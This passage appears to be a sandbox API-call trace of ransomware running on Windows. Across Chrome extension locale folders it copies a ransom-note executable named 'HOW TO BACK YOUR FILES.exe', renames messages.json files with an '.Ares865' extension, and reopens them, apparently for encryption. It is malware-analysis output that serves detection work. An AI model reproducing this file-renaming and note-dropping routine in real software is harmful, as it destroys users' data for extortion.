TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.122] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.122] GetLastError () returned 0x0 [0103.123] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.123] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e72c10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee3ac40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee3ac40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.123] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.123] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.123] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.Ares865") returned 161 [0103.123] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.125] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=256) returned 1 [0103.129] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da" [0103.129] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da" [0103.129] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.129] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.130] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.130] GetLastError () returned 0x0 [0103.130] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.130] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e4cab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee3ac40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee3ac40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.130] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.130] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.131] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.Ares865") returned 161 [0103.131] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.133] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=243) returned 1 [0103.138] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs" [0103.138] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs" [0103.138] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.139] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.139] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.139] GetLastError () returned 0x0 [0103.140] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.140] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e4cab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee60da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee60da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.140] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.140] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.140] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.Ares865") returned 161 [0103.140] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.142] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=259) returned 1 [0103.147] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca" [0103.147] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca" [0103.147] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.147] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.148] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.148] GetLastError () returned 0x0 [0103.148] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.148] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e4cab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee60da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee60da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.148] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.148] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.148] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.Ares865") returned 161 [0103.148] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.150] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=265) returned 1 [0103.154] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg" [0103.154] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg" [0103.154] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.154] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.155] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.155] GetLastError () returned 0x0 [0103.155] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.155] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e4cab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee60da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee60da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.155] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.155] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.156] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.Ares865") returned 161 [0103.156] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.158] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=319) returned 1 [0103.161] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar" [0103.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar" [0103.161] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.161] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.161] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.162] GetLastError () returned 0x0 [0103.162] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 